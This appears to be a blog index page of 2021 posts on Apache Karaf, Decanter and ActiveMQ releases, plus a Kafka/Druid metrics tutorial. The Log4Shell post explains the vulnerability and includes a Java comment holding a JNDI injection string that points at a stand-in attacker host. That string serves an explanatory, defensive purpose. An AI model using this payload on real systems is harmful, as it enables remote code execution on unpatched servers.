Posts

Showing posts from 2021

Apache Karaf runtime 4.3.5 and 4.2.14 are available, status regarding Log4Shell

You probably heard about the security issue concerning log4j. This vulnerability in log4j is called Log4Shell. Basically, the Log4Shell exploit gives attackers a simple way to execute code on any vulnerable machine: to exploit the vulnerability, an attacker has to cause the application to save a special string of characters in the log. The log4j community quickly fixed this issue by releasing corrected versions, starting from log4j 2.15.0 up to 2.17.0. In Apache Karaf runtime, we don't directly use log4j (or any logging framework). Karaf leverages Pax Logging, which abstracts/packages the logging frameworks in a central logging service. The Pax Logging API bundle repackages the log4j, logback, slf4j, etc. packages. The first step was to upgrade the log4j packages in Pax Logging and cut new Pax Logging releases. That's what we did: Pax Logging 2.0.12 has been released, upgrading to log4j 2.17.0 (fixing CVE-2021-45105 and CVE-2021-44228) and logback 1.2.9 (fixing CVE-2021-42550). Pax Logg…
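To make the attack vector concrete, here is a minimal sketch of the vulnerable pattern on an unpatched log4j 2.x (a hypothetical class and input of mine, not code from Karaf or Pax Logging): any attacker-controlled string that reaches the logger can trigger a JNDI lookup.

    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;

    public class LoginAudit {
        private static final Logger LOG = LogManager.getLogger(LoginAudit.class);

        public void onLogin(String userAgent) {
            // On log4j 2.x before the fixed releases, a value such as
            // "${jndi:ldap://attacker.example/a}" is interpolated here,
            // causing a remote JNDI lookup and possible code execution.
            LOG.info("Login from user agent: {}", userAgent);
        }
    }

Upgrading Pax Logging (and thus the embedded log4j) removes this message-lookup behavior, so the string is logged verbatim.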

What's new in Apache Karaf Decanter 2.8.0?

Apache Karaf Decanter 2.8.0 has just been released. This release includes several fixes, improvements, and dependency updates. I encourage all Decanter users to upgrade to the 2.8.0 release ;) In this blog post, I will highlight some important changes and fixes we did in this release. Prometheus appender: the Prometheus appender has been improved to expose more gauges. As a reminder, the Decanter Prometheus appender is basically a servlet that exposes Prometheus-compliant data, which Prometheus instances can poll to get the latest metrics. The Prometheus appender only looks for numeric data (coming from the Decanter collectors) to create and expose gauges. Unfortunately, in previous Decanter releases, the Prometheus appender only looked for numeric values in "first level" properties. It means that if a collected data property value was a Map, no inner data was considered by the Prometheus appender, even if the inner values were numeric. That's the first improvem…
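As an illustration of that nested-values improvement, here is a sketch I wrote for this post (not Decanter's actual code) of recursively walking the collected data and keeping only numeric leaves as gauge candidates:

    import java.util.HashMap;
    import java.util.Map;

    public class GaugeFlattener {
        // Flatten nested maps, keeping numeric values as gauge candidates.
        public static Map<String, Number> flatten(String prefix, Map<String, Object> data) {
            Map<String, Number> gauges = new HashMap<>();
            for (Map.Entry<String, Object> entry : data.entrySet()) {
                String key = prefix.isEmpty() ? entry.getKey() : prefix + "_" + entry.getKey();
                Object value = entry.getValue();
                if (value instanceof Number) {
                    gauges.put(key, (Number) value);
                } else if (value instanceof Map) {
                    @SuppressWarnings("unchecked")
                    Map<String, Object> inner = (Map<String, Object>) value;
                    gauges.putAll(flatten(key, inner));
                }
            }
            return gauges;
        }
    }

With this kind of traversal, a collected property like systemLoad -> {cpu0: 0.42} ends up exposed as a systemLoad_cpu0 gauge instead of being dropped.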

What's new in Apache Karaf runtime 4.3.3?

Apache Karaf runtime 4.3.3 has been released. This release contains a bunch of fixes, dependency updates, and improvements. I will share some highlights of this release. You can download Apache Karaf runtime here: http://karaf.apache.org/download.html . The release notes are available here: https://issues.apache.org/jira/secure/ReleaseNote.jspa?projectId=12311140&version=12350142 . JDK 17 support for build and runtime: Karaf 4.3.3 now fully supports JDK 17, both at build time and at runtime. For JDK 17 support, we did: a new ASM version, new JDK options at runtime, new packages exported by Karaf. Cleanly close SSH connections: we identified an issue with the Karaf SSH connections. The SSH connections were not cleanly closed, and we had to wait for the timeout to close the socket. It means we could have this state once the SSH client disconnects:

    $ netstat | grep 8101
    tcp6 0 0 localhost:8101 localhost:47844 CLOSE_WAIT

4.3.3 fixes…
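On the client side, the fix means a disconnect now releases the socket right away. As a sketch (assuming the Apache Mina SSHD client API, which Karaf's SSH console is built on, and the default karaf/karaf credentials on port 8101), a session closed via try-with-resources should no longer leave the server in CLOSE_WAIT:

    import org.apache.sshd.client.SshClient;
    import org.apache.sshd.client.session.ClientSession;

    public class SshCheck {
        public static void main(String[] args) throws Exception {
            SshClient client = SshClient.setUpDefaultClient();
            client.start();
            // Connect to the Karaf SSH console (default port 8101).
            try (ClientSession session = client.connect("karaf", "localhost", 8101)
                    .verify(5000).getSession()) {
                session.addPasswordIdentity("karaf");
                session.auth().verify(5000);
            } // closing the session now cleanly closes the socket
            client.stop();
        }
    }

Running netstat again after the disconnect should show no lingering CLOSE_WAIT entry on port 8101.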

Apache ActiveMQ 5.16.3 has been released

Apache ActiveMQ 5.16.3 has been released today. In this blog post, I would like to highlight some changes we introduced in this release. Better Camel 3.x support and JMS 2 dependency: I've rewritten the Karaf features repository in ActiveMQ 5.16.3. First, the Karaf features don't contain an inner repository anymore. The purpose is to let users pick the version they want at runtime. Concretely, it means that, in Karaf, ActiveMQ 5.16.3 can already use Spring 5 (full Spring 5 support, including in the ActiveMQ standalone distribution, is already done on the main branch for ActiveMQ 5.17.x). By the way, I will do a similar improvement in the Apache CXF and Apache Camel features repositories (removing the inner repository to let users pick at runtime), and Karaf will provide spec features in a dedicated features repository. I also updated the version range to support the JMS 2.x dependency, instead of always forcing JMS 1.x. Even if ActiveMQ 5.16.3 doesn't really support JMS 2, you can already…
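In practice, picking the versions at runtime looks like the hedged Karaf shell sketch below (I'm assuming the standard "activemq" repository alias and the activemq-broker feature name; exact repository URLs and feature names may differ in your setup):

    karaf@root()> feature:repo-add activemq 5.16.3
    karaf@root()> feature:install activemq-broker

Since the features repository no longer drags in an inner repository, whatever Spring feature repository you registered beforehand is the one the ActiveMQ features resolve against.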

What's new in Apache Karaf runtime 4.3.2?

Apache Karaf runtime 4.3.2 has been released and is available on https://karaf.apache.org . You can take a look at the Release Notes. Let's take a quick tour of this new Karaf release. Support for the R7 configuration factory and a fix on the JSON check: Karaf 4.3.x introduced both support of the OSGi R7 spec and JSON configuration support (in addition to the "regular" cfg/properties format). We identified an issue in the JSON configuration format: when the JSON contains an array, it was always considered as updated. For instance, the following configuration: { "foo": [ "bar" ] } was considered as always updated. We can see in the log:

    2021-05-07T23:01:45,924 | INFO | fileinstall-/[...]/karaf/etc | JsonConfigInstaller | 25 - org.apache.karaf.config.core - 4.3.1 | Updating configuration from my.config.json
    2021-05-07T23:03:45,924 | INFO | fileinstall-/[...]/karaf/etc | JsonConfigInstaller | 25 - org.apache.karaf.config.co…
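My guess at why arrays tripped the update check (an illustration of mine, not the actual JsonConfigInstaller code): Java arrays don't override equals(), so comparing the old and the freshly parsed array property with equals() always reports a difference, even for identical contents.

    import java.util.Arrays;

    public class ArrayEqualityDemo {
        public static void main(String[] args) {
            String[] previous = { "bar" };
            String[] reloaded = { "bar" };
            // Identity comparison: false, so the config looks "updated" on every scan.
            System.out.println(previous.equals(reloaded));        // false
            // Content comparison: true, comparing element by element fixes the check.
            System.out.println(Arrays.equals(previous, reloaded)); // true
        }
    }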

What's new in Apache ActiveMQ 5.16.2?

Apache ActiveMQ 5.15.15 and 5.16.2 have been released. 5.15.15 is the last planned release on the 5.15.x branch, and it contains only bug fixes. If you use ActiveMQ 5.15.x, you should upgrade to 5.16.x. Now, we are focusing on 5.16.x and the coming 5.17.x (see later in this blog). ActiveMQ 5.16.2 brings important fixes and improvements. Let's take a quick tour ;) Fix on failover priorityBackup: when you have brokers located on different networks, failover priorityBackup allows you to specify a preference for the "local" broker. For instance, you can use a broker URL like this:

    failover:(tcp://local:61616,tcp://remote:61616)?randomize=false&priorityBackup=true

With this URL, the client will try to connect to tcp://local:61616 and stay connected there. The client will connect to remote only if local is not available. However, the client will constantly try to reconnect to local. Once the client can do it (when local is back), it will automatically reconnect. By default, the first U…
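On the client side, this URL is simply passed to the connection factory. A minimal sketch with the standard ActiveMQ JMS API (the local/remote hostnames are the placeholders from the URL above):

    import javax.jms.Connection;
    import org.apache.activemq.ActiveMQConnectionFactory;

    public class PriorityBackupClient {
        public static void main(String[] args) throws Exception {
            ActiveMQConnectionFactory factory = new ActiveMQConnectionFactory(
                "failover:(tcp://local:61616,tcp://remote:61616)?randomize=false&priorityBackup=true");
            Connection connection = factory.createConnection();
            connection.start();
            // The client stays on tcp://local:61616 whenever it is reachable,
            // falls back to remote otherwise, and moves back to local when it returns.
            connection.close();
        }
    }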

What's new in Apache Karaf 4.3.1?

Apache Karaf 4.3.1 has just been released. It's now available on http://karaf.apache.org/download.html . It contains the same features as Apache Karaf 4.2.11, which you can find on https://nanthrax.blogspot.com/2021/03/whats-new-in-apache-karaf-4211.html . Of course, Karaf 4.3.1 contains some specific fixes and improvements. Updated system packages (for OSGi R7): since OSGi R7, the java.* packages should be exported by the framework (aka system packages). As Karaf 4.3.x is based on OSGi R7, it should do so. Karaf uses configuration files to list the packages it exports. Regarding the packages provided by the JDK, Karaf uses etc/jre.properties to export the packages depending on the JDK version (aka the execution environment). Karaf 4.3.1 has been updated to cleanly export the java.* packages; this was done by adding these packages to the etc/jre.properties configuration file. Features JSON format: Karaf Features is the main provisioning extension for Apache Karaf. Basic…
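For illustration, the change amounts to listing java.* packages among the exported ones per execution environment. The fragment below is abridged and hypothetical (the real etc/jre.properties lists many more packages per jre-* key; check your distribution's file for the exact contents):

    # etc/jre.properties (abridged, illustrative)
    jre-11 = \
        java.lang, \
        java.util, \
        java.io, \
        javax.naming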

What's new in Apache Karaf 4.2.11?

Even if Apache Karaf 4.2.11 is a "minor" version on the Karaf 4.2.x series, it brings some interesting small stuff ;) Karaf BoM: like Apache Karaf 4.3.0, Karaf 4.2.11 now provides a Bill Of Materials (BoM) simplifying the management of Karaf dependency versions. All Karaf examples now use the BoM. In your project, you can use the Karaf BoM like this:

    <dependencyManagement>
      <dependencies>
        <dependency>
          <groupId>org.apache.karaf</groupId>
          <artifactId>karaf-bom</artifactId>
          <version>4.2.11</version>
          <type>pom</type>
          <scope>import</scope>
        </dependency>
      </dependencies>
    </dependencyManagement>

The BoM provides all Karaf dependencies. It means you can directly use the Karaf dependencies like this: <dependency> <groupId>o…
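To complete the picture with a hedged example (org.apache.karaf.shell.core is a pick of mine standing in for any artifact the BoM manages), a dependency inheriting its version from the BoM simply omits the <version> element:

    <dependency>
      <groupId>org.apache.karaf.shell</groupId>
      <artifactId>org.apache.karaf.shell.core</artifactId>
    </dependency>

The version is resolved from the imported karaf-bom, so upgrading Karaf becomes a single version bump in dependencyManagement.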

What's new in Apache Karaf Decanter 2.7.0?

Apache Karaf Decanter 2.7.0 release is currently on vote. I'm anticipating the release a little bit to do some highlights about what's coming ;) Karaf Decanter 2.7.0 is an important milestone as it brings new features, especially around big data and cloud. HDFS and S3 appenders: Decanter 2.7.0 brings two new appenders: the HDFS and S3 appenders. The HDFS appender is able to store the collected data on HDFS (using CSV format by default). Similarly, the S3 appender stores the collected data as an object in an S3 bucket. Let's illustrate this with a simple use case using the S3 appender. First, let's create an S3 bucket on AWS. Now we have our decanter-test S3 bucket ready. Let's start a Karaf instance with the Decanter S3 appender enabled. Then, we configure the S3 appender in etc/org.apache.karaf.decanter.appender.s3.cfg :

    ###############################
    # Decanter Appender S3 Configuration
    ###############################
    # AWS credentials
    accessKeyId=...
    secr…
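Before editing that file, the appender has to be installed. Assuming the usual Decanter feature naming (decanter-appender-s3, following the decanter-appender-* convention; run feature:list to confirm the exact name in your release), the Karaf shell session would look like:

    karaf@root()> feature:repo-add decanter
    karaf@root()> feature:install decanter-appender-s3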

Complete metrics collection and analytics with Apache Karaf Decanter, Apache Kafka and Apache Druid

In this blog post, I will show how to extend Karaf Decanter as a log and metrics collection layer, with storage and analytics powered by Apache Druid. The idea is to collect machine metrics (using the Decanter OSHI collector for instance), send them to a Kafka broker, and aggregate and analyze the metrics in Druid. Apache Kafka: we can ingest data in Apache Druid using several channels (in streaming mode or batch mode). For this blog post, I will use streaming mode with Apache Kafka. For the purpose of the blog, I will simply start a ZooKeeper:

    $ bin/zookeeper-server-start.sh config/zookeeper.properties

and a Kafka 2.6.1 broker:

    $ bin/kafka-server-start.sh config/server.properties
    ...
    [2021-01-19 14:57:26,528] INFO [KafkaServer id=0] started (kafka.server.KafkaServer)

I create a decanter topic where we're going to send the metrics:

    $ bin/kafka-topics.sh --bootstrap-server localhost:9092 --create --topic decanter --partitions 2
    $ bin/kafka-topics.sh --bootstrap-server localhost:9092 -…
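To sanity-check the pipeline before wiring Druid in, you can watch the decanter topic with the standard Kafka console consumer (the topic name matches the one created above):

    $ bin/kafka-console-consumer.sh --bootstrap-server localhost:9092 --topic decanter --from-beginning

Once the Decanter Kafka appender is sending, you should see the collected metrics events flowing as JSON messages.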